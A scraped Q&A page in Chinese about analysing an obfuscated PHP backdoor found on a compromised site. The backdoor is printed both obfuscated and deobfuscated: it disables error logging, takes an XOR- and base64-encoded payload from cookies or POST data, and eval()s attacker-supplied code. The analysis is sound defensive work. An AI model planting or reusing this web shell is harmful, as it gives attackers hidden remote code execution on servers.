What is a promise in Javascript?

Question

Juan Pinzón

Asked: 2020-11-15 06:45:41 +0800 CST 2020-11-15 06:45:41 +0800 CST 2020-11-15 06:45:41 +0800 CST

反混淆 php 代码

772

我正在分析一些受损的 PHP 文件并遇到了一些混淆的脚本，这里是其中之一：

<?php
$i9c4 = 487;
$GLOBALS['a1c573'] = Array();
global $a1c573;
$a1c573 = $GLOBALS;
$ {
    "\x47\x4c\x4fB\x41\x4c\x53"
}

['p0279'] = "\x74\x4b\x2a\x4a\x26\x21\xa\x64\x6b\x61\x2e\xd\x3f\x3d\x73\x3c\x65\x2b\x9\x2d\x6a\x55\x24\x6f\x44\x5f\x79\x5a\x7d\x33\x46\x32\x50\x54\x63\x2c\x7c\x77\x75\x7a\x30\x27\x62\x52\x22\x4d\x39\x58\x41\x6c\x5c\x53\x76\x68\x20\x60\x57\x59\x6d\x5b\x66\x43\x23\x40\x7b\x3b\x4c\x2f\x49\x78\x29\x45\x5e\x28\x3a\x56\x70\x67\x69\x34\x38\x42\x31\x6e\x72\x25\x5d\x47\x7e\x51\x36\x4f\x35\x48\x3e\x4e\x37\x71";
$a1c573[$a1c573['p0279'][84] . $a1c573['p0279'][42] . $a1c573['p0279'][16] . $a1c573['p0279'][96] . $a1c573['p0279'][92]] = $a1c573['p0279'][34] . $a1c573['p0279'][53] . $a1c573['p0279'][84];
$a1c573[$a1c573['p0279'][77] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][92]] = $a1c573['p0279'][23] . $a1c573['p0279'][84] . $a1c573['p0279'][7];
$a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]] = $a1c573['p0279'][14] . $a1c573['p0279'][0] . $a1c573['p0279'][84] . $a1c573['p0279'][49] . $a1c573['p0279'][16] . $a1c573['p0279'][83];
$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][82] . $a1c573['p0279'][60] . $a1c573['p0279'][7] . $a1c573['p0279'][34]] = $a1c573['p0279'][78] . $a1c573['p0279'][83] . $a1c573['p0279'][78] . $a1c573['p0279'][25] . $a1c573['p0279'][14] . $a1c573['p0279'][16] . $a1c573['p0279'][0];
$a1c573[$a1c573['p0279'][42] . $a1c573['p0279'][79] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][46] . $a1c573['p0279'][7] . $a1c573['p0279'][34] . $a1c573['p0279'][42]] = $a1c573['p0279'][14] . $a1c573['p0279'][16] . $a1c573['p0279'][84] . $a1c573['p0279'][78] . $a1c573['p0279'][9] . $a1c573['p0279'][49] . $a1c573['p0279'][78] . $a1c573['p0279'][39] . $a1c573['p0279'][16];
$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][96] . $a1c573['p0279'][29] . $a1c573['p0279'][29] . $a1c573['p0279'][80] . $a1c573['p0279'][34] . $a1c573['p0279'][92] . $a1c573['p0279'][42] . $a1c573['p0279'][16]] = $a1c573['p0279'][76] . $a1c573['p0279'][53] . $a1c573['p0279'][76] . $a1c573['p0279'][52] . $a1c573['p0279'][16] . $a1c573['p0279'][84] . $a1c573['p0279'][14] . $a1c573['p0279'][78] . $a1c573['p0279'][23] . $a1c573['p0279'][83];
$a1c573[$a1c573['p0279'][58] . $a1c573['p0279'][9] . $a1c573['p0279'][96] . $a1c573['p0279'][34]] = $a1c573['p0279'][38] . $a1c573['p0279'][83] . $a1c573['p0279'][14] . $a1c573['p0279'][16] . $a1c573['p0279'][84] . $a1c573['p0279'][78] . $a1c573['p0279'][9] . $a1c573['p0279'][49] . $a1c573['p0279'][78] . $a1c573['p0279'][39] . $a1c573['p0279'][16];
$a1c573[$a1c573['p0279'][0] . $a1c573['p0279'][9] . $a1c573['p0279'][92] . $a1c573['p0279'][9] . $a1c573['p0279'][34]] = $a1c573['p0279'][42] . $a1c573['p0279'][9] . $a1c573['p0279'][14] . $a1c573['p0279'][16] . $a1c573['p0279'][90] . $a1c573['p0279'][79] . $a1c573['p0279'][25] . $a1c573['p0279'][7] . $a1c573['p0279'][16] . $a1c573['p0279'][34] . $a1c573['p0279'][23] . $a1c573['p0279'][7] . $a1c573['p0279'][16];
$a1c573[$a1c573['p0279'][60] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][29] . $a1c573['p0279'][16] . $a1c573['p0279'][34] . $a1c573['p0279'][16] . $a1c573['p0279'][40] . $a1c573['p0279'][90]] = $a1c573['p0279'][14] . $a1c573['p0279'][16] . $a1c573['p0279'][0] . $a1c573['p0279'][25] . $a1c573['p0279'][0] . $a1c573['p0279'][78] . $a1c573['p0279'][58] . $a1c573['p0279'][16] . $a1c573['p0279'][25] . $a1c573['p0279'][49] . $a1c573['p0279'][78] . $a1c573['p0279'][58] . $a1c573['p0279'][78] . $a1c573['p0279'][0];
$a1c573[$a1c573['p0279'][76] . $a1c573['p0279'][90] . $a1c573['p0279'][7] . $a1c573['p0279'][31] . $a1c573['p0279'][34] . $a1c573['p0279'][29] . $a1c573['p0279'][34] . $a1c573['p0279'][79]] = $a1c573['p0279'][8] . $a1c573['p0279'][9] . $a1c573['p0279'][46] . $a1c573['p0279'][16] . $a1c573['p0279'][46] . $a1c573['p0279'][96] . $a1c573['p0279'][16] . $a1c573['p0279'][96] . $a1c573['p0279'][92];
$a1c573[$a1c573['p0279'][8] . $a1c573['p0279'][60] . $a1c573['p0279'][46] . $a1c573['p0279'][16] . $a1c573['p0279'][79] . $a1c573['p0279'][42]] = $a1c573['p0279'][77] . $a1c573['p0279'][82] . $a1c573['p0279'][82] . $a1c573['p0279'][96] . $a1c573['p0279'][29];
$a1c573[$a1c573['p0279'][60] . $a1c573['p0279'][92] . $a1c573['p0279'][34] . $a1c573['p0279'][42]] = $_POST;
$a1c573[$a1c573['p0279'][53] . $a1c573['p0279'][9] . $a1c573['p0279'][96] . $a1c573['p0279'][92] . $a1c573['p0279'][40] . $a1c573['p0279'][16] . $a1c573['p0279'][46] . $a1c573['p0279'][46] . $a1c573['p0279'][46]] = $_COOKIE;
@$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][82] . $a1c573['p0279'][60] . $a1c573['p0279'][7] . $a1c573['p0279'][34]]($a1c573['p0279'][16] . $a1c573['p0279'][84] . $a1c573['p0279'][84] . $a1c573['p0279'][23] . $a1c573['p0279'][84] . $a1c573['p0279'][25] . $a1c573['p0279'][49] . $a1c573['p0279'][23] . $a1c573['p0279'][77], NULL);
@$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][82] . $a1c573['p0279'][60] . $a1c573['p0279'][7] . $a1c573['p0279'][34]]($a1c573['p0279'][49] . $a1c573['p0279'][23] . $a1c573['p0279'][77] . $a1c573['p0279'][25] . $a1c573['p0279'][16] . $a1c573['p0279'][84] . $a1c573['p0279'][84] . $a1c573['p0279'][23] . $a1c573['p0279'][84] . $a1c573['p0279'][14], 0);
@$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][82] . $a1c573['p0279'][60] . $a1c573['p0279'][7] . $a1c573['p0279'][34]]($a1c573['p0279'][58] . $a1c573['p0279'][9] . $a1c573['p0279'][69] . $a1c573['p0279'][25] . $a1c573['p0279'][16] . $a1c573['p0279'][69] . $a1c573['p0279'][16] . $a1c573['p0279'][34] . $a1c573['p0279'][38] . $a1c573['p0279'][0] . $a1c573['p0279'][78] . $a1c573['p0279'][23] . $a1c573['p0279'][83] . $a1c573['p0279'][25] . $a1c573['p0279'][0] . $a1c573['p0279'][78] . $a1c573['p0279'][58] . $a1c573['p0279'][16], 0);
@$a1c573[$a1c573['p0279'][60] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][29] . $a1c573['p0279'][16] . $a1c573['p0279'][34] . $a1c573['p0279'][16] . $a1c573['p0279'][40] . $a1c573['p0279'][90]](0);
$n68b9ce = NULL;
$r8fa539 = NULL;
$a1c573[$a1c573['p0279'][0] . $a1c573['p0279'][31] . $a1c573['p0279'][96] . $a1c573['p0279'][40] . $a1c573['p0279'][29] . $a1c573['p0279'][9] . $a1c573['p0279'][60] . $a1c573['p0279'][46] . $a1c573['p0279'][9]] = $a1c573['p0279'][16] . $a1c573['p0279'][82] . $a1c573['p0279'][16] . $a1c573['p0279'][29] . $a1c573['p0279'][29] . $a1c573['p0279'][92] . $a1c573['p0279'][9] . $a1c573['p0279'][92] . $a1c573['p0279'][19] . $a1c573['p0279'][82] . $a1c573['p0279'][34] . $a1c573['p0279'][90] . $a1c573['p0279'][60] . $a1c573['p0279'][19] . $a1c573['p0279'][79] . $a1c573['p0279'][92] . $a1c573['p0279'][46] . $a1c573['p0279'][29] . $a1c573['p0279'][19] . $a1c573['p0279'][9] . $a1c573['p0279'][40] . $a1c573['p0279'][40] . $a1c573['p0279'][16] . $a1c573['p0279'][19] . $a1c573['p0279'][46] . $a1c573['p0279'][40] . $a1c573['p0279'][29] . $a1c573['p0279'][82] . $a1c573['p0279'][80] . $a1c573['p0279'][7] . $a1c573['p0279'][40] . $a1c573['p0279'][34] . $a1c573['p0279'][90] . $a1c573['p0279'][92] . $a1c573['p0279'][92] . $a1c573['p0279'][90];
global $t2703af9a;

function g1173($n68b9ce, $me55b842b)
{
    global $a1c573;
    $e538b = "";
    for ($sa5c67645 = 0; $sa5c67645 < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($n68b9ce);) {
        for ($xf042d3f = 0; $xf042d3f < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($me55b842b) && $sa5c67645 < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($n68b9ce); $xf042d3f++, $sa5c67645++) {
            $e538b.= $a1c573[$a1c573['p0279'][84] . $a1c573['p0279'][42] . $a1c573['p0279'][16] . $a1c573['p0279'][96] . $a1c573['p0279'][92]]($a1c573[$a1c573['p0279'][77] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][92]]($n68b9ce[$sa5c67645]) ^ $a1c573[$a1c573['p0279'][77] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][92]]($me55b842b[$xf042d3f]));
        }
    }

    return $e538b;
}

function ka9e97e75($n68b9ce, $me55b842b)
{
    global $a1c573;
    global $t2703af9a;
    return $a1c573[$a1c573['p0279'][8] . $a1c573['p0279'][60] . $a1c573['p0279'][46] . $a1c573['p0279'][16] . $a1c573['p0279'][79] . $a1c573['p0279'][42]]($a1c573[$a1c573['p0279'][8] . $a1c573['p0279'][60] . $a1c573['p0279'][46] . $a1c573['p0279'][16] . $a1c573['p0279'][79] . $a1c573['p0279'][42]]($n68b9ce, $t2703af9a) , $me55b842b);
}

foreach($a1c573[$a1c573['p0279'][53] . $a1c573['p0279'][9] . $a1c573['p0279'][96] . $a1c573['p0279'][92] . $a1c573['p0279'][40] . $a1c573['p0279'][16] . $a1c573['p0279'][46] . $a1c573['p0279'][46] . $a1c573['p0279'][46]] as $me55b842b => $s51f5) {
    $n68b9ce = $s51f5;
    $r8fa539 = $me55b842b;
}

if (!$n68b9ce) {
    foreach($a1c573[$a1c573['p0279'][60] . $a1c573['p0279'][92] . $a1c573['p0279'][34] . $a1c573['p0279'][42]] as $me55b842b => $s51f5) {
        $n68b9ce = $s51f5;
        $r8fa539 = $me55b842b;
    }
}

$n68b9ce = @$a1c573[$a1c573['p0279'][58] . $a1c573['p0279'][9] . $a1c573['p0279'][96] . $a1c573['p0279'][34]]($a1c573[$a1c573['p0279'][76] . $a1c573['p0279'][90] . $a1c573['p0279'][7] . $a1c573['p0279'][31] . $a1c573['p0279'][34] . $a1c573['p0279'][29] . $a1c573['p0279'][34] . $a1c573['p0279'][79]]($a1c573[$a1c573['p0279'][0] . $a1c573['p0279'][9] . $a1c573['p0279'][92] . $a1c573['p0279'][9] . $a1c573['p0279'][34]]($n68b9ce) , $r8fa539));

if (isset($n68b9ce[$a1c573['p0279'][9] . $a1c573['p0279'][8]]) && $t2703af9a == $n68b9ce[$a1c573['p0279'][9] . $a1c573['p0279'][8]]) {
    if ($n68b9ce[$a1c573['p0279'][9]] == $a1c573['p0279'][78]) {
        $sa5c67645 = Array(
            $a1c573['p0279'][76] . $a1c573['p0279'][52] => @$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][96] . $a1c573['p0279'][29] . $a1c573['p0279'][29] . $a1c573['p0279'][80] . $a1c573['p0279'][34] . $a1c573['p0279'][92] . $a1c573['p0279'][42] . $a1c573['p0279'][16]]() ,
            $a1c573['p0279'][14] . $a1c573['p0279'][52] => $a1c573['p0279'][82] . $a1c573['p0279'][10] . $a1c573['p0279'][40] . $a1c573['p0279'][19] . $a1c573['p0279'][82],
        );
        echo @$a1c573[$a1c573['p0279'][42] . $a1c573['p0279'][79] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][46] . $a1c573['p0279'][7] . $a1c573['p0279'][34] . $a1c573['p0279'][42]]($sa5c67645);
    }
    elseif ($n68b9ce[$a1c573['p0279'][9]] == $a1c573['p0279'][16]) {
        eval /*qc7b4*/
        ($n68b9ce[$a1c573['p0279'][7]]);
    }

    exit();
} 
?>

为了更好地理解这些脚本，我制作了一个获得以下内容print_r的变量：$GLOBALS

Array
(
    [_GET] => Array
        (
        )

    [_POST] => Array
        (
        )

    [_COOKIE] => Array
        (
        )

    [_FILES] => Array
        (
        )

    [GLOBALS] => Array
 *RECURSION*
    [i9c4] => 487
    [a1c573] => Array
 *RECURSION*
    [p0279] => tK*J&!
dka.
?=s<e+  -jU$oD_yZ}3F2PTc,|wuz0'bR"M9XAl\Svh `WYm[fC#@{;L/Ix)E^(:Vpgi48B1nr%]G~Q6O5H>N7q
    [rbe75] => chr
    [g6725] => ord
    [a24153d81] => strlen
    [u1fdc] => ini_set
    [b4729dcb] => serialize
    [u7338c5be] => phpversion
    [ma7c] => unserialize
    [ta5ac] => base64_decode
    [f673ece06] => set_time_limit
    [p6d2c3c4] => ka9e97e75
    [kf9e4b] => g1173
    [f5cb] => Array
        (
        )

    [ha750e999] => Array
        (
        )

    [n68b9ce] => 
    [r8fa539] => 
    [t2703af9a] => e1e335a5-1c6f-4593-a00e-90318d0c6556
)

基于此，我的问题是：

有没有办法对这段代码进行去混淆以使其更易于理解？或者可以做些什么来了解它是如何工作的？

3 Answers

Voted

Juan Pinzón · Answer 1 · 2020-11-17T13:17:52+08:00

PHP 中的大多数混淆脚本可以使用 4 种方法进行反混淆，可能还有更多，但到目前为止我已经找到了这些方法，在介绍这些方法之前，我将放置一些对执行这项任务有用的工具。

反混淆 PHP 代码的常用工具

非PHP。该工具极大地帮助对包含多余功能的脚本进行反混淆。在许多情况下，应该首先访问此站点和其他类似站点，以便更好地理解混淆代码。但是，在某些情况下，UnPHP 将无法对初始代码进行反混淆处理。在这些情况下，有必要使用其他工具来对脚本进行反混淆。
PHP 美化器。这是将不可读的代码格式化为一行的出色工具，因此代码将缩进并更易于阅读。
Base64 解码器。在这种情况下，链接是谷歌搜索，因为有多种此类工具可以在线使用，或者通过在本地安装它们在我们的机器上运行它们。
PHP沙箱。此工具对于运行混淆脚本非常有用，因为它们可能是某种恶意软件或进行远程连接，因此不建议在您自己的服务器上运行代码。类似这样的工具还有很多可以在google上搜索到，你可以用你最喜欢的那个。

常见的混淆方法

黑客或程序员混淆他们的代码有不同的方法，这里有一些常用的技术来做到这一点，这样可以更好地理解如何执行反向任务。

ASCII 编码。您可以在链接列表中查找十六进制数。在 PHP 中，这些十六进制代码可以用反斜杠 x 后跟数字或字母来表示。

例子：
```
\x48 = H
\x34 = 4
\x78 = x
```

但是，这些字符不一定只用表示\x，也可以\#安全使用。

Unicode 字符串。与之前的形式类似，但使用\u#的是\x#.

例子：
```
\u004D = M
\u0065 = e
\u0020 =  (space)
\u0070 = p
\u006c = l
\u0073\ = s
```

Base64 编码。Base64 与上面提到的混淆方法有点不同，但解码起来还是比较容易的。

示例字符串：

 SSBsaWtlIGRvbnV0cw== = I like donuts

 ZXZhbChiYXNlNjRfZGVjb2RlKCJoYXgiKSk7 = eval(base64_decode("hax"));

 QXNzdW1pbmcgZGlyZWN0IGNvbnRyb2w= = Assuming direct control

存储在字符串中的垃圾，即由 for 循环、while 循环、正则表达式等分隔的字符串。这些需要自己手动解码，因为它们差异很大。幸运的是，上述方法可以更好地帮助对这些类型的字符串进行反混淆。

去混淆变量名

如果无法通过前面提到的方法对变量名进行反混淆，则必须手动进行反混淆，这是一个非常耗时的过程。正如@Eferion的回答中提到的

幸运的是，寻找常见的恶意软件模式，如关闭日志文件、使用 eval() 函数或带有混淆的 preg_replace() 表明有问题。

混淆是错误的方法，如果在受感染的网站文件中发现混淆代码，则应假定该网站已被黑客入侵。我们自己的代码不应该被混淆。

以牺牲可用性为代价的安全不是安全。

去混淆的风险

尝试在我们自己的 Web 服务器上解密这些文件是不安全的，原因有很多，其中一些我们可能不知道。您不应尝试在您自己的 Web 服务器上对 PHP 文件进行去混淆处理。因为您可能会无意中引入额外的后门，或者帮助恶意软件自行传播，因为许多脚本远程加载功能。

反混淆代码

遵循上述方法后，我能够得到以下反混淆代码：

<?php
$i9c4 = 487;
$GLOBALS['a1c573'] = Array();
global $a1c573;
$a1c573 = $GLOBALS;

$ {
    "GLOBALS"
}

['p0279'] = 'tK*J&!dka.?=s<e+  -jU$oD_yZ}3F2PTc,|wuz0\'bR"M9XAl\Svh `WYm[fC#@{;L/Ix)E^(:Vpgi48B1nr%]G~Q6O5H>N7q';
$a1c573['rbe75'] = chr;
$a1c573['g6725'] = ord;
$a1c573['a24153d81'] = strlen;
$a1c573['u1fdc'] = ini_set;
$a1c573['b4729dcb'] = serialize;
$a1c573['u7338c5be'] = phpversion;
$a1c573['ma7c'] = unserialize;
$a1c573['ta5ac'] = base64_decode;
$a1c573['f673ece06'] = set_time_limit;
$a1c573['p6d2c3c4'] = ka9e97e75;
$a1c573['kf9e4b'] = g1173;
$a1c573['f5cb'] = $_POST;
$a1c573['ha750e999'] = $_COOKIE;
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
$parametro_1 = NULL;
$r8fa539 = NULL;
$a1c573['t2703af9a'] = 'e1e335a5-1c6f-4593-a00e-90318d0c6556';
global $t2703af9a;

function g1173($parametro_1, $parametro_2)
{
    global $a1c573;
    $retorno = "";
    for ($i = 0; $i < strlen($parametro_1);) {
        for ($j = 0; $j < strlen($parametro_2) && $i < strlen($parametro_1); $j++, $i++) {
            $retorno.= chr(ord($parametro_1[$i]) ^ ord($parametro_2[$j]));
        }
    }

    return $retorno;
}

function ka9e97e75($parametro_1, $parametro_2)
{
    global $a1c573;
    global $t2703af9a;
    return g1173(g1173($parametro_1, $t2703af9a) , $parametro_2);
}

foreach($_COOKIE as $parametro_2 => $s51f5) {
    $parametro_1 = $s51f5;
    $r8fa539 = $parametro_2;
}

if (!$parametro_1) {
    foreach($_POST as $parametro_2 => $s51f5) {
        $parametro_1 = $s51f5;
        $r8fa539 = $parametro_2;
    }
}

$parametro_1 = @unserialize(ka9e97e75(base64_decode($parametro_1) , $r8fa539));

if (isset($parametro_1[$a1c573['p0279'][9] . $a1c573['p0279'][8]]) && $t2703af9a == $parametro_1[$a1c573['p0279'][9] . $a1c573['p0279'][8]]) {
    if ($parametro_1[$a1c573['p0279'][9]] == $a1c573['p0279'][78]) {
        $i = Array(
            $a1c573['p0279'][76] . $a1c573['p0279'][52] => @phpversion() ,
            $a1c573['p0279'][14] . $a1c573['p0279'][52] => $a1c573['p0279'][82] . $a1c573['p0279'][10] . $a1c573['p0279'][40] . $a1c573['p0279'][19] . $a1c573['p0279'][82],
        );
        echo @serialize($i);
    }
    elseif ($parametro_1[$a1c573['p0279'][9]] == $a1c573['p0279'][16]) {
        eval /*qc7b4*/
        ($parametro_1[$a1c573['p0279'][7]]);
    }

    exit();
}
?>

此答案基于在社区中找到的信息：

堆栈交换信息安全

eferion · Answer 2 · 2020-11-15T07:32:25+08:00

$a1c573 = $GLOBALS;

请注意，$a1c573它几乎用于所有代码。直到下一行，唯一要做的就是初始化数组$GOBALS：

global $t2703af9a;

如果您制作一个小脚本，$aqc573['p0279']它以指示每个元素的位置、相关字符和所述值的整个对应关系的方式打印的内容（以防万一）。像这样的东西：

0: t 116
1: K 75
2: * 42
3: J 74
4: & 38
5: ! 33
6:   10
7: d 100
8: k 107
9: a 97
10: . 46
11:   13
12: ? 63
13: = 61
...

现在，例如，如果您采用第一个功能：

function g1173($n68b9ce, $me55b842b)
{
    global $a1c573;
    $e538b = "";
    for ($sa5c67645 = 0; $sa5c67645 < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($n68b9ce);) {
        for ($xf042d3f = 0; $xf042d3f < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($me55b842b) && $sa5c67645 < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($n68b9ce); $xf042d3f++, $sa5c67645++) {
            $e538b.= $a1c573[$a1c573['p0279'][84] . $a1c573['p0279'][42] . $a1c573['p0279'][16] . $a1c573['p0279'][96] . $a1c573['p0279'][92]]($a1c573[$a1c573['p0279'][77] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][92]]($n68b9ce[$sa5c67645]) ^ $a1c573[$a1c573['p0279'][77] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][92]]($me55b842b[$xf042d3f]));
        }
    }

    return $e538b;
}

代替$sa5c67645、和。$i_ $n68b9ce_ _$param1$me55b842b$param2

如果我们专注于 if，现在的条件是指：

$i < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($n68b9ce)

我们将参考资料翻译成以下p0279内容：

$i < $a1c573["a24103d81"]($param1)

如果我们查看位置$GLOBALS的内容，a24103d81我们发现它对应于 command strlen，那么循环看起来像这样：

for ($i = 0; $i < strlen($param1); )

我们对第二个循环及其内容做同样的事情。最后函数看起来像这样：

function g1173($param1, $param2)
{
  global $a1c573;
  $toReturn = "";
  for ($i = 0; $i < strlen($param1); ) {
    for ($j = 0; $j < strlen($param2) && $i < strlen($param1); $j++, $i++) {
      $toReturn.= chr(ord($param1[$i]) ^ ord($param2[$j]));
    }
  }

  return $toReturn;
}

其余部分大致相同，您可以$a1c573['p0279']通过分解代码来制作一个脚本，在其对应的字符中执行一些第一次翻译。

Carlos Garcia · Answer 3 · 2020-11-17T09:52:27+08:00

Carlos Garcia

2020-11-17T09:52:27+08:002020-11-17T09:52:27+08:00

网上有dezender（DeZender/De-ionCube）之类的程序，试一试。基本上你需要一个 php 代码反混淆器

0

反混淆 php 代码

反混淆 PHP 代码的常用工具

常见的混淆方法

去混淆变量名

去混淆的风险

反混淆代码

HTML button that sends you to another page

Why do I get the error "Call to undefined function mysql_connect()"?

How to create an HTML button that works as a link?

How to separate a String in Java. How to use split()

Filter by dates in sql server

How to limit the number of decimal places in a double?

For each in JavaScript?

Position footer ALWAYS glued to the footer

Definitive Guide to Type Conversion in Java

How to properly compare Strings (and objects) in Java?